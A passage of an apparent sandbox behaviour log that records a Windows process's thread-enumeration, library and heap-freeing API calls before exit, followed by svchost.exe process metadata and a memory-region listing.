[0157.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0198.314] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0198.345] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0202.317] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0202.323] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0202.324] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0202.324] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0202.324] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0202.324] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0202.324] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e70c0 | out: hHeap=0x4d0000) returned 1 [0202.326] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db620 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d98b0 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d4f70 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0060 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d4fb0 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d4060 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db800 | out: hHeap=0x4d0000) returned 1 [0202.326] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d9be0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db410 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d4ff0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d5030 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d25e0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d3e90 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d3eb0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0830 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db4a0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0600 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d3f30 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d3f50 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db710 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db7d0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e82e0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db350 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db9f0 | out: hHeap=0x4d0000) returned 1 [0202.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dba70 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dba90 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dbab0 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e85e0 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e8320 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9230 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db740 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9090 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db470 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9350 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d9ea0 | out: hHeap=0x4d0000) returned 1 [0202.328] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d4830 | out: hHeap=0x4d0000) returned 1 [0202.331] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5eb0 | out: hHeap=0x4d0000) returned 1 [0202.331] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0202.332] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dac70 | out: hHeap=0x4d0000) returned 1 [0202.332] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5ae0 | out: hHeap=0x4d0000) returned 1 [0202.332] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0202.333] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0202.333] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0202.333] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0202.333] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0202.336] LocalFree (hMem=0x4d9740) returned 0x0 [0202.336] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0202.336] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0202.336] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e2030 | out: hHeap=0x4d0000) returned 1 [0202.337] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e4650 | out: hHeap=0x4d0000) returned 1 [0202.337] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0202.609] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0202.610] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0202.610] ExitProcess (uExitCode=0x0) [0202.610] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dc2f0 | out: hHeap=0x4d0000) returned 1 Thread: id = 141 os_tid = 0x12b0 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x757f8000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bf3c" [0xc000000f], "LOCAL" [0x7] Region: id = 2675 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2676 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2677 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2678 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2679 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2680 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2681 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2682 start_va = 0x100000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2683 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2684 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2685 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2686 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2687 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2688 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2689 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2690 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2691 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2692 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2693 start_va = 0x680000 end_va = 0x6e3fff monitored = 0 entry_point = 0x695ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2694 start_va = 0x6f0000 end_va = 0x6f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2695 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2696 start_va = 0x800000 